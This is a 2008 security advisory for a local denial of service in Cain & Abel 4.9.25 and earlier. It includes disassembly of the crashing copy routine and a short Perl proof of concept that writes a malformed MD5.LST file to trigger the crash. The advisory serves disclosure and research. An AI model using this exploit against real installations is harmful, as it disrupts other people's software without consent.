Title: Cain & Abel <= 4.9.25 Local Denial Of Service Site: http://www.oxid.it/cain.html Date: 15.12.2008 Author(s): Glafkos Charalambous glafkos[at]astalavista[dot]com George Nicolaou ishtus[at]astalavista[dot]com Technical Description: 0042DAD1 56 PUSH ESI ; length 0042DAD2 57 PUSH EDI ; hash 0042DAD3 E8 686A1000 CALL dmp_.00534540 ; check_validity(char *hash,int length) return allocated space offset 0042DAD8 68 C8010000 PUSH 1C8 0042DADD 8BE8 MOV EBP,EAX ; Take the return offset from check_validity() and store in EBP Function at 0x534540 returns EAX = 00000000 if length >= 1 and any of the characters in a hash are not hexadecimal OR it returns a memory pointer 0042DB19 8BF5 MOV ESI,EBP ; ESI = EBP 0042DB1B F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; Crash if ECX != 00 0042DB1D 8BC8 MOV ECX,EAX 0042DB1F 83E1 03 AND ECX,3 0042DB22 F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] ; Crash AT 0042DB1B ECX=00000004 (decimal 4.) (REP counter) DS:[ESI]=[00000000]=??? ES:[EDI]=[01500B48]=00000000 (note that if ECX = 00000000 (counter), then the crash occurs at 0042DB22) Therefore as long as the hash contains one non-hexadecimal character and its length is greater than 2, cain crashes. Similar issues exist in other LST files POC Code: #!/usr/bin/perl # # Author(s) # Glafkos Charalambous [glafkos at astalavista dot com] # George Nicolaou [ishtus at astalavista dot com] # # Title Cain & Abel <= 4.9.25 Local Denial Of Service # Get your copy: http://www.oxid.it/cain.html # Date 15.12.2008 use strict; use warnings; my $evil = "amVsZW5hdnVrb3ZpYzIwMDBAeWFob28u"; my $n = "\x09" x 2; # You can also try MD2/MD4 LST open(my $LST, "> MD5.LST"); print $LST $evil.$n; close($LST);